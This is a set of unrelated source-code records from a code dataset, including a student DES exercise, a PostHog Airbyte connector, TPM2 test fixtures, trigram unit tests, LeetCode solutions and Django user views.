Ahmad Wijayakusuma\t(V3920029)\r\nIvan Fausta Dinata\t\t\t\t(V3920030) \r\nKreshna Pura Adi Wicaksana\t\t(V3920032) \r\n\"\"\"\r\n\r\n#Sintak b untuk bytes. Panjang n byte block \r\nkey = b'23tfwk4' \r\npanjang_key = len(key) #For key bytes lenght\r\ndata = b'A2g4j6F8' #Data is convert to bytes \r\npanjang_data = len(data) #For data bytes lenght\r\n\r\n#ENKRIPSI\r\nBLOCK_SIZE = 32 #Ukuran blok(32 atau 64 bit)\r\ndes = DES.new(key,DES.MODE_ECB) #DES is active\r\npadded_txt = pad(data, BLOCK_SIZE) #Padd txt is active\r\nhasil1 = des.encrypt(padded_txt) #Encrypt was used for end result1\r\nif panjang_key <= 8 :\r\n if panjang_data == 8:\r\n print('KEY harus lebih dari 8 bit dan PESAN tidak boleh 8 bit')\r\n else:\r\n print('\\nEnkripsi:',hasil1) #Result print\r\n\r\n#DEKRIPSI\r\nif panjang_key <= 8 :\r\n if panjang_data == 8:\r\n print('KEY harus lebih dari 8 bit dan PESAN tidak boleh 8 bit')\r\n else:\r\n BLOCK_SIZE = 32\r\n des = DES.new(key,DES.MODE_ECB)\r\n padded_txt = pad(data, BLOCK_SIZE)\r\n hasil2 = des.decrypt(hasil1) #Decrypt was used for end result2 from result1 converted before it\r\n print(\"\\nDekripsi:\",hasil2,\"\\n\") #Result print","sub_path":"Kelompok 1/DES_Crytodome_Python.py","file_name":"DES_Crytodome_Python.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"570792261","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 8 15:20:09 2017\n\n@author: hpy2\n\"\"\"\n\nimport requests\nimport json\nimport hashlib\nfrom pyfiglet import Figlet\n\ndef main(filepath, trialchainip):\n url = \"http://{0}:9000/trialchain/data_asset\".format(trialchainip)\n with open(filepath, 'rb') as f:\n data = f.read()\n hasher = hashlib.md5()\n hasher.update(data)\n md5 = hasher.hexdigest()\n r = requests.get(url, params={\"md5\": md5, \"trialchainip\": trialchainip})\n response = r.json()\n f = Figlet(font='slant')\n print(f.renderText('TrialChain'))\n ordered = {\n 'asset': response['asset'],\n 'sha256': response['sha256'],\n 'issuetxid': response['issuetxid'],\n 'source': response['source'],\n 'issued': response['issued'],\n 'validated': response['validated'],\n 'ethstatus': response['ethstatus'],\n 'confirmations': response['confirmations'],\n 'mchash': response['mchash'],\n 'ethtxid': response['ethtxid']\n }\n print(json.dumps(ordered, indent=4))\n","sub_path":"scripts/AssetChecker/src/checker/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"10651256","text":"#\n# Copyright (c) 2021 Airbyte, Inc., all rights reserved.\n#\n\n\nimport math\nimport urllib.parse\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Iterable, List, Mapping, MutableMapping, Optional, Sequence\n\nimport requests\nfrom airbyte_cdk.models import SyncMode\nfrom airbyte_cdk.sources.streams.http import HttpStream\n\n\nclass PosthogStream(HttpStream, ABC):\n primary_key = \"id\"\n data_field = \"results\"\n\n def __init__(self, base_url: str, **kwargs):\n super().__init__(**kwargs)\n self._url_base = f\"{base_url}/api/\"\n\n @property\n def url_base(self) -> str:\n return self._url_base\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n resp_json = response.json()\n if resp_json.get(\"next\"):\n next_query_string = urllib.parse.urlsplit(resp_json[\"next\"]).query\n params = dict(urllib.parse.parse_qsl(next_query_string))\n return params\n\n def request_headers(self, **kwargs) -> Mapping[str, Any]:\n return {\"Content-Type\": \"application/json\", \"User-Agent\": \"posthog-python/1.4.0\"}\n\n def parse_response(self, response: requests.Response, stream_state: Mapping[str, Any], **kwargs) -> Iterable[Mapping]:\n response_data = response.json()\n if self.data_field:\n response_data = response_data.get(self.data_field)\n\n if isinstance(response_data, Sequence):\n yield from response_data\n elif response_data:\n yield response_data\n\n def request_params(\n self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None\n ) -> MutableMapping[str, Any]:\n\n params = {}\n if next_page_token:\n params.update(next_page_token)\n return params\n\n\nclass IncrementalPosthogStream(PosthogStream, ABC):\n \"\"\"\n Because endpoints has descending order we need to save initial state value to know when to stop pagination.\n start_date is used to as a min date to filter on.\n \"\"\"\n\n state_checkpoint_interval = math.inf\n\n def __init__(self, base_url: str, start_date: str, **kwargs):\n super().__init__(base_url=base_url, **kwargs)\n self._start_date = start_date\n self._initial_state = None # we need to keep it here because next_page_token doesn't accept state argument\n\n @property\n @abstractmethod\n def cursor_field(self) -> str:\n \"\"\"\n Defining a cursor field indicates that a stream is incremental, so any incremental stream must extend this class\n and define a cursor field.\n \"\"\"\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n \"\"\"\n Return next page token until we reach the page with records older than state/start_date\n \"\"\"\n response_json = response.json()\n data = response_json.get(self.data_field, [])\n latest_record = data[-1] if data else None # records are ordered so we check only last one\n\n if not latest_record or latest_record[self.cursor_field] > self._initial_state:\n return super().next_page_token(response=response)\n\n def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"\n Return the latest state by comparing the cursor value in the latest record with the stream's most recent state object\n and returning an updated state object.\n \"\"\"\n latest_state = latest_record.get(self.cursor_field)\n current_state = current_stream_state.get(self.cursor_field) or latest_state\n return {self.cursor_field: max(latest_state, current_state)}\n\n def parse_response(self, response: requests.Response, stream_state: Mapping[str, Any], **kwargs) -> Iterable[Mapping]:\n \"\"\"\n Filter records by initial_state value\n \"\"\"\n data = super().parse_response(response=response, stream_state=stream_state, **kwargs)\n for record in data:\n if record.get(self.cursor_field) >= self._initial_state:\n yield record\n\n def read_records(\n self,\n sync_mode: SyncMode,\n cursor_field: List[str] = None,\n stream_slice: Mapping[str, Any] = None,\n stream_state: Mapping[str, Any] = None,\n ) -> Iterable[Mapping[str, Any]]:\n \"\"\"\n Initialize initial_state value\n \"\"\"\n stream_state = stream_state or {}\n self._initial_state = self._initial_state or stream_state.get(self.cursor_field) or self._start_date\n return super().read_records(sync_mode=sync_mode, cursor_field=cursor_field, stream_slice=stream_slice, stream_state=stream_state)\n\n\nclass Annotations(IncrementalPosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/annotations\n \"\"\"\n\n cursor_field = \"updated_at\"\n\n def path(self, **kwargs) -> str:\n return \"annotation\"\n\n def request_params(self, stream_state: Mapping[str, Any], **kwargs) -> MutableMapping[str, Any]:\n params = super().request_params(stream_state=stream_state, **kwargs)\n params[\"order\"] = f\"-{self.cursor_field}\" # sort descending\n return params\n\n\nclass Cohorts(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/cohorts\n normal ASC sorting. But without filters like `since`\n \"\"\"\n\n def path(self, **kwargs) -> str:\n return \"cohort\"\n\n\nclass Events(IncrementalPosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/events\n \"\"\"\n\n cursor_field = \"timestamp\"\n\n def path(self, stream_slice: Mapping[str, Any] = None, **kwargs) -> str:\n return \"event\"\n\n def request_params(self, stream_state: Mapping[str, Any], **kwargs) -> MutableMapping[str, Any]:\n params = super().request_params(stream_state=stream_state, **kwargs)\n since_value = stream_state.get(self.cursor_field) or self._start_date\n since_value = max(since_value, self._start_date)\n params[\"after\"] = since_value\n return params\n\n\nclass EventsSessions(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/events\n \"\"\"\n\n primary_key = \"global_session_id\"\n data_field = \"result\"\n\n def path(self, **kwargs) -> str:\n return \"event/sessions\"\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n resp_json = response.json()\n return resp_json.get(\"pagination\")\n\n\nclass FeatureFlags(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/feature-flags\n \"\"\"\n\n def path(self, **kwargs) -> str:\n return \"feature_flag\"\n\n\nclass Insights(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/insights\n Endpoint does not support incremental read because id, created_at and last_refresh are ordered in any particular way\n \"\"\"\n\n def path(self, **kwargs) -> str:\n return \"insight\"\n\n\nclass InsightsPath(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/insights\n \"\"\"\n\n primary_key = None\n data_field = \"result\"\n\n def path(self, **kwargs) -> str:\n return \"insight/path\"\n\n\nclass InsightsSessions(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/insights\n \"\"\"\n\n primary_key = None\n data_field = \"result\"\n\n def path(self, **kwargs) -> str:\n return \"insight/session\"\n\n\nclass Persons(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/people\n \"\"\"\n\n def path(self, **kwargs) -> str:\n return \"person\"\n\n\nclass Trends(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/insights\n \"\"\"\n\n primary_key = None\n data_field = \"result\"\n\n def path(self, **kwargs) -> str:\n return \"insight/trend\"\n\n\nclass PingMe(PosthogStream):\n \"\"\"\n Docs: https://posthog.com/docs/api/user\n \"\"\"\n\n data_field = None\n\n def path(self, **kwargs) -> str:\n return \"users/@me\"\n","sub_path":"airbyte-integrations/connectors/source-posthog/source_posthog/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"596310121","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 5 17:38:05 2019\r\n\r\n@author: Modo\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.io\r\nimport matplotlib.pyplot as plt\r\nimport function_definition as fd\r\n\r\n## =========== Part 1: Loading and Visualizing Data =============\r\ndata = scipy.io.loadmat('ex3data1.mat') \r\nX = data['X'] \r\ny = data['y'].flatten()\r\nm = np.size(X, 0)\r\n\r\nsel = np.random.permutation(m)\r\nsel = X[sel[0:100],:]\r\nfd.displayData(sel)\r\n\r\n## ================ Part 2: Loading Pameters ================\r\nparam = scipy.io.loadmat('ex3weights.mat')\r\ntheta1 = param['Theta1']\r\ntheta2 = param['Theta2']\r\n\r\n## ================= Part 3: Implement Predict =================\r\npred = fd.predict(theta1,theta2,X)\r\nprint('Training Set Accuracy: %.2f%%' % (np.mean(pred == y) * 100))\r\n\r\nrp = np.random.permutation(m)\r\nfor i in range(1,m+1):\r\n print('\\nDisplaying Example Image\\n'); \r\n plt.matshow(X[rp[i], :].reshape(20,20))\r\n plt.show()\r\n \r\n pred = fd.predict(theta1, theta2, X[rp[i], :].reshape(1,400));\r\n print('\\nNeural Network Prediction: %d' % pred);\r\n s = input('Paused - press enter to continue, q to exit:');\r\n if s == 'q':\r\n break\r\n \r\n \r\n","sub_path":"Machine Learning/ex3 Multi-class Classification and Neural Networks/Neural_Networks.py","file_name":"Neural_Networks.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"558573452","text":"import datetime\nfrom base_client import BaseClient\n\n\nclass Friends(BaseClient):\n class FriendsNotFound(Exception):\n @staticmethod\n def msg():\n print('Friends not found')\n\n method = 'friends'\n http_method = 'get'\n\n def __init__(self, uid):\n self.uid = uid\n\n def get_params(self):\n return {'user_id': self.uid, 'fields': 'bdate'}\n\n def response_handler(self, response):\n friends = response.json().get('response')\n if not friends:\n raise self.FriendsNotFound\n\n ages = []\n today = datetime.datetime.today()\n c = []\n\n for friend in friends:\n date = friend.get('bdate')\n\n try:\n dt = datetime.datetime.strptime(date, '%d.%m.%Y')\n except TypeError:\n continue\n except ValueError:\n continue\n\n age = today.year - dt.year\n if today.month < dt.month:\n age -= 1\n elif today.month == dt.month and today.day < dt.day:\n age -= 1\n\n ages.append(age)\n\n\n\n\n return ages\n","sub_path":"friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"512306791","text":"import os\nimport time\nimport tempfile\nimport unittest\nimport contextlib\n\nfrom tpm2_pytss import tcti\nfrom tpm2_pytss.esys import ESYS\nfrom tpm2_pytss.fapi import FAPI, FAPIConfig\nfrom tpm2_pytss.exceptions import TPM2Error\nfrom tpm2_pytss.util.simulator import SimulatorTest\n\nENV_TCTI = \"PYESYS_TCTI\"\nENV_TCTI_DEFAULT = \"mssim\"\nENV_TCTI_CONFIG = \"PYESYS_TCTI_CONFIG\"\nENV_TCTI_CONFIG_DEFAULT = None\n\nTCTI_RETRY_TRIES = 50\nTCTI_RETRY_TIMEOUT = 0.5\n\n\nclass TCTIRetry:\n def __init__(\n self, i=0, timeout=TCTI_RETRY_TIMEOUT, tries=0, max_tries=TCTI_RETRY_TRIES\n ):\n self.i = i\n self.timeout = timeout\n self.tries = tries\n self.max_tries = max_tries\n self.success = False\n\n def __str__(self):\n return \"%s(i=%d, timeout=%f, tries=%d, max_tries=%d, success=%s)\" % (\n self.__class__.__qualname__,\n self.i,\n self.timeout,\n self.tries,\n self.max_tries,\n self.success,\n )\n\n\n@contextlib.contextmanager\ndef retry_tcti_catch(retry):\n retry.success = True\n try:\n yield retry\n except TPM2Error as error:\n retry.success = False\n if not \"tcti:IO failure\" in str(error):\n raise\n time.sleep(retry.timeout)\n retry.tries += 1\n retry.timeout *= 1.08\n print(retry)\n if retry.tries > retry.max_tries:\n raise\n\n\ndef retry_tcti_loop(timeout=TCTI_RETRY_TIMEOUT, max_tries=TCTI_RETRY_TRIES):\n retry = TCTIRetry(i=-1, timeout=timeout, max_tries=max_tries)\n while not retry.success:\n retry.i += 1\n yield retry\n\n\nclass BaseTestESYS(SimulatorTest, unittest.TestCase):\n \"\"\"\n ESYS tests should subclass from this\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.esys = ESYS()\n self.tcti = tcti.TCTI.load(os.getenv(ENV_TCTI, default=ENV_TCTI_DEFAULT))\n self.tcti_config = os.getenv(\n ENV_TCTI_CONFIG, default=\"port=%d\" % (self.simulator.port)\n )\n # Create a context stack\n self.ctx_stack = contextlib.ExitStack().__enter__()\n # Enter the contexts\n for retry in retry_tcti_loop():\n with retry_tcti_catch(retry):\n self.tcti_ctx = self.ctx_stack.enter_context(\n self.tcti(config=self.tcti_config)\n )\n self.esys_ctx = self.ctx_stack.enter_context(self.esys(self.tcti_ctx))\n # Call Startup and clear the TPM\n self.esys_ctx.Startup(self.esys_ctx.TPM2_SU_CLEAR)\n # Set the timeout to blocking\n self.esys_ctx.SetTimeout(self.esys_ctx.TSS2_TCTI_TIMEOUT_BLOCK)\n\n def tearDown(self):\n super().tearDown()\n self.ctx_stack.__exit__(None, None, None)\n\n\nclass BaseTestFAPI(SimulatorTest, unittest.TestCase):\n \"\"\"\n FAPI tests should subclass from this\n \"\"\"\n\n def setUp(self):\n super().setUp()\n # Create a context stack\n self.ctx_stack = contextlib.ExitStack().__enter__()\n # Create temporary directories\n self.user_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())\n self.log_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())\n self.system_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())\n # Create the FAPI object\n self.fapi = FAPI(\n FAPIConfig.default()._replace(\n user_dir=self.user_dir,\n system_dir=self.system_dir,\n log_dir=self.log_dir,\n tcti=\"mssim:port=%d\" % (self.simulator.port,),\n )\n )\n # Enter the contexts\n for retry in retry_tcti_loop():\n with retry_tcti_catch(retry):\n self.fapi_ctx = self.ctx_stack.enter_context(self.fapi)\n\n def tearDown(self):\n super().tearDown()\n self.ctx_stack.__exit__(None, None, None)\n","sub_path":"tests/base_esys.py","file_name":"base_esys.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"401982038","text":"# Copyright 2018 ICON Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"A base class of consensus for the loopchain\"\"\"\nimport logging\nfrom abc import ABCMeta, abstractmethod\nfrom loopchain import configure as conf\nfrom loopchain.blockchain import BlockBuilder\nfrom loopchain.blockchain import TransactionVersions, Transaction, TransactionStatusInQueue, TransactionVerifier\n\n\nclass ConsensusBase(metaclass=ABCMeta):\n \"\"\"LoopChain 의 Consensus Algorithm 을 표현하는 클래스\n \"\"\"\n\n def __init__(self, blockmanager):\n self._blockmanager = blockmanager\n self._channel_name = blockmanager.channel_name\n self._made_block_count = 0\n self._blockchain = self._blockmanager.get_blockchain()\n self._txQueue = self._blockmanager.get_tx_queue()\n\n @property\n def made_block_count(self):\n return self._made_block_count\n\n def stop(self):\n pass\n\n @abstractmethod\n async def consensus(self):\n \"\"\"Block Manager 의 Thread Loop 에서 호출 하는 합의 알고리즘\n \"\"\"\n pass\n\n def _makeup_block(self):\n block_builder = BlockBuilder.new(\"0.1a\")\n\n tx_versions = TransactionVersions()\n while self._txQueue:\n if len(block_builder) >= conf.MAX_TX_SIZE_IN_BLOCK:\n logging.debug(f\"consensus_base total size({len(block_builder)}) \"\n f\"count({len(block_builder.transactions)}) \"\n f\"_txQueue size ({len(self._txQueue)})\")\n break\n\n tx: 'Transaction' = self._txQueue.get_item_in_status(\n TransactionStatusInQueue.normal,\n TransactionStatusInQueue.added_to_block\n )\n if tx is None:\n break\n\n tx_hash_version = tx_versions.get_hash_generator_version(tx.version)\n tv = TransactionVerifier.new(tx.version, tx_hash_version)\n\n try:\n tv.verify(tx, self._blockchain)\n except Exception as e:\n logging.warning(f\"tx hash invalid. tx: {tx}\")\n else:\n block_builder.transactions[tx.hash] = tx\n\n return block_builder\n","sub_path":"loopchain/peer/consensus_base.py","file_name":"consensus_base.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"246473614","text":"\"\"\"\n 给定一个数组,将数组中的元素向右移动 k 个位置,其中 k 是非负数。\n\n 示例 1:\n 输入: [1,2,3,4,5,6,7] 和 k = 3\n 输出: [5,6,7,1,2,3,4]\n 解释:\n 向右旋转 1 步: [7,1,2,3,4,5,6]\n 向右旋转 2 步: [6,7,1,2,3,4,5]\n 向右旋转 3 步: [5,6,7,1,2,3,4]\n\n 示例 2:\n 输入: [-1,-100,3,99] 和 k = 2\n 输出: [3,99,-1,-100]\n 解释:\n 向右旋转 1 步: [99,-1,-100,3]\n 向右旋转 2 步: [3,99,-1,-100]\n\n 说明:\n 尽可能想出更多的解决方案,至少有三种不同的方法可以解决这个问题。\n 要求使用空间复杂度为 O(1) 的 原地 算法。\n https://leetcode-cn.com/problems/rotate-array\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n return self.use_reverse(nums, k)\n\n @classmethod\n def use_loop(cls, nums: List[int], k: int) -> None:\n nums_len = len(nums)\n k = k % nums_len\n\n move_times = index = 0\n\n while index < len(nums):\n value = nums[index]\n new_index = (index + k) % nums_len\n\n while True:\n old_value = nums[new_index]\n\n # 更新值\n nums[new_index] = value\n move_times += 1\n\n new_index = (index + k) % nums_len\n value = old_value\n\n if new_index == index:\n move_times += 1\n nums[new_index] = value\n break\n index += 1\n\n if move_times == nums_len:\n break\n\n @classmethod\n def use_reverse(cls, nums: List[int], k: int) -> None:\n k = k % len(nums)\n cls.reversed_nums(nums, 0, len(nums) - 1)\n cls.reversed_nums(nums, 0, k - 1)\n cls.reversed_nums(nums, k, len(nums) - 1)\n\n @classmethod\n def reversed_nums(cls, nums: List[int], start: int, end: int) -> None:\n while start < end:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end -= 1\n","sub_path":"algorithm/LeetCode_189_旋转数组.py","file_name":"LeetCode_189_旋转数组.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"467942627","text":"import unittest\nfrom mock import patch, mock_open\nfrom collections import Counter\nfrom Trigram import Trigram\n\nfrom sys import version_info\nif version_info.major == 2:\n import __builtin__ as builtins\nelse:\n import builtins\n\nclass Test_Trigram(unittest.TestCase):\n\n # Class-wide Tests\n def test_trigram_constructor_saves_input_text(self):\n text = 'the quick brown fox jumped over the fence'\n trigram = Trigram('the quick brown fox jumped over the fence')\n self.assertEqual(trigram.input_text, text)\n\n def test_trigram_constructor_default_is_empty_string(self):\n trigram = Trigram()\n self.assertEqual(trigram.input_text, '')\n\n def test_trigram_constructor_instantiates_empty_trigram_map_dict(self):\n trigram = Trigram()\n self.assertEqual(trigram.map, {})\n\n # parse() tests\n def test_parse_makes_trigram_map_a_dictionary(self):\n trigram = Trigram('the quick brown fox jumped over the fence')\n trigram.parse()\n self.assertIsInstance(trigram.map, dict)\n\n def test_parse_raises_error_if_text_has_less_than_three_words(self):\n trigram = Trigram('two words')\n self.assertRaises(ValueError, trigram.parse)\n\n def test_parse_adds_dictionary_entry_of_first_two_words(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertEqual('three whole', trigram.map.keys()[0])\n\n def test_parse_return_dict_values_are_counters(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertIsInstance(trigram.map['three whole'], Counter)\n\n def test_parse_return_dict_has_second_bigram_as_key(self):\n trigram = Trigram('four whole real words')\n trigram.parse()\n self.assertIsInstance(trigram.map['whole real'], Counter)\n\n def test_parse_return_dict_value_counters_increment_to_1(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertEqual(1, trigram.map['three whole']['words'])\n\n def test_parse_return_dict_value_counters_increment_to_2(self):\n trigram = Trigram('three whole words and three whole words')\n trigram.parse()\n self.assertEqual(2, trigram.map['three whole']['words'])\n\n def test_running_parse_twice_with_append_map_true_double_counts(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n trigram.parse(append_map=True)\n self.assertEqual(2, trigram.map['three whole']['words'])\n\n # predict_next_word tests\n def test_predict_next_word_returns_string(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'three whole')\n self.assertIsInstance(next_word, str)\n\n def test_predict_next_word_errors_if_no_map(self):\n trigram = Trigram()\n self.assertRaises(ValueError, trigram.predict_next_word, 'anything')\n\n def test_predict_next_word_returns_third_word_for_trigram_input(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'three whole')\n self.assertEqual('words', next_word)\n\n def test_predict_next_word_returns_only_possible_answer_for_longer_corpus(self):\n trigram = Trigram('three whole words are not enough to properly test '\n 'this method so how about fifteen')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'enough to')\n self.assertEqual('properly', next_word)\n\n def test_predict_next_word_returns_most_likely_word(self):\n trigram = Trigram('two words this '\n 'two words that '\n 'two words this')\n trigram.parse()\n next_word = trigram.predict_next_word(bigram = 'two words')\n self.assertEqual('this', next_word)\n\n def test_predict_next_word_throws_key_error_if_map_missing_bigram(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertRaises(KeyError, trigram.predict_next_word, 'a word')\n\n # generate_text tests\n def test_generate_text_returns_string(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n text = trigram.generate_text(start_text = 'three whole')\n self.assertIsInstance(text, str)\n\n def test_generate_text_errors_if_start_text_is_less_than_two_words(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n self.assertRaises(ValueError, trigram.generate_text, 'three')\n\n def test_generate_text_returns_third_whole_trigram(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n text = trigram.generate_text(start_text = 'three whole')\n self.assertEqual('three whole words', text)\n\n def test_generate_text_returns_only_start_text_if_no_match(self):\n trigram = Trigram('three whole words')\n trigram.parse()\n text = trigram.generate_text(start_text = 'what the')\n self.assertEqual('what the', text)\n\n def test_generate_text_limited_by_max_words_property(self):\n trigram = Trigram('sorry sorry sorry')\n trigram.parse()\n text = trigram.generate_text(start_text = 'sorry sorry',\n max_words = 4)\n self.assertEqual('sorry sorry sorry sorry', text)\n\n # load_from_file tests\n @patch('Trigram.os.path')\n def test_mapbox_load_from_file_checks_for_file_existance(self,\n mock_os_path):\n mock_os_path.exists.return_value = True\n trigram = Trigram()\n with patch.object(builtins, 'open',\n mock_open(read_data='three whole words')):\n trigram.load_from_file(filename = 'filename.txt')\n mock_os_path.exists.assert_called_once_with('filename.txt')\n\n @patch('Trigram.os.path')\n def test_mapbox_load_from_file_errors_if_no_file(self, mock_os_path):\n mock_os_path.exists.return_value = False\n trigram = Trigram()\n self.assertRaises(IOError, trigram.load_from_file, 'filename.txt')\n\n @patch('Trigram.os.path')\n def test_mapbox_load_from_file_populates_input_text(self, mock_os_path):\n mock_os_path.exists.return_value = True\n trigram = Trigram()\n with patch.object(builtins, 'open',\n mock_open(read_data='three whole words')):\n trigram.load_from_file(filename = 'filename.txt')\n self.assertEqual('three whole words', trigram.input_text)\n","sub_path":"trigrams/mbramson/test_trigram.py","file_name":"test_trigram.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"296142734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis program asks the user to enter a sentence, prints the number of words and\nthe occurances for each word with amount of letters in the given word.\n\"\"\"\n\ndef get_num_letters(word):\n \"\"\"\n Return number of letters in a word.\n Would be easier just to use len() directly than this function...\n \"\"\"\n return len(word)\n\ndef get_unique_words(sentence):\n \"\"\"\n Return a dictionary with each unique word as the key and number of occurances\n as the value in a given sentence.\n \"\"\"\n words = {}\n # Split sentence by space\n for word in sentence.split(' '):\n # convert to lowercase\n word_lower = word.lower()\n # If the word exists, increase the count\n if words.get(word_lower):\n words[word_lower] += 1\n # If not, add the word to the dictionary and set count to 1\n else:\n words[word_lower] = 1\n\n return words\n\ndef main():\n # Get a sentence from the user\n user_input = input('Enter a sentence: ')\n\n # Print number of words in the sentence\n print('It is {} words in your sentence.'.format(len(user_input.split(' '))))\n # Print word, occurance and number of letters for each unique word\n for word, count in get_unique_words(user_input).items():\n print('The word \"{}\"\\toccur {} times, \\tand has {} letters.'.format(word, count, get_num_letters(word)))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"oblig4/ordtelling.py","file_name":"ordtelling.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"168756680","text":"# sort the words, then keep in the set and check for nextWord[:-1] in the set\r\nclass Solution:\r\n def longestWord(self, words: List[str]) -> str: \r\n words.sort()\r\n res = \"\"\r\n st = set()\r\n st.add(\"\")\r\n \r\n for word in words:\r\n if word[:-1] in st:\r\n st.add(word)\r\n if len(word) > len(res):\r\n res = word\r\n\r\n return res\r\n \r\n# Time: O(sum(w)+N), w is the length of each word in words, N is the length of words.\r\n# Space: O(sum(w))\r\n \r\n \r\n# sorted words: ['a', 'ap', 'app', 'appl', 'apple', 'apply', 'banana'] \r\n\r\n# word: a\r\n# res: a\r\n# set: {'', 'a'}\r\n# ----------\r\n# word: ap\r\n# res: ap\r\n# set: {'', 'a', 'ap'}\r\n# ----------\r\n# word: app\r\n# res: app\r\n# set: {'', 'a', 'app', 'ap'}\r\n# ----------\r\n# word: appl\r\n# res: appl\r\n# set: {'', 'appl', 'app', 'ap', 'a'}\r\n# ----------\r\n# word: apple\r\n# res: apple\r\n# set: {'', 'appl', 'app', 'ap', 'apple', 'a'}\r\n# ----------\r\n# word: apply\r\n# res: apple\r\n# set: {'', 'appl', 'app', 'ap', 'apply', 'apple', 'a'}\r\n# ----------\r\n# word: banana","sub_path":"04 Hash Table/720. Longest Word in Dictionary.py","file_name":"720. Longest Word in Dictionary.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"55283210","text":"from django.shortcuts import render, redirect \nfrom django.contrib import messages\nfrom .forms import UserRegisterForm ,ProfileUpdateForm, UserUpdateForm\n\n\n\n\n\ndef register(request):\n if request.method == \"POST\":\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, f'Account Created Successfully, Please Login')\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request,'users/register.html', {\"form\":form})\n\n\ndef profile(request):\n if not request.user.is_authenticated:\n messages.warning(request, f'Please Login to Access this page')\n return redirect('login')\n else:\n if request.method == \"POST\":\n u_form = UserUpdateForm(request.POST,instance =request.user)\n p_form = ProfileUpdateForm(request.POST,request.FILES,instance = request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, f'Account Updated')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance =request.user)\n p_form = ProfileUpdateForm(instance = request.user.profile)\n\n context = {\n 'u_form':u_form,\n 'p_form':p_form\n }\n return render(request, 'users/profile.html',context)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} 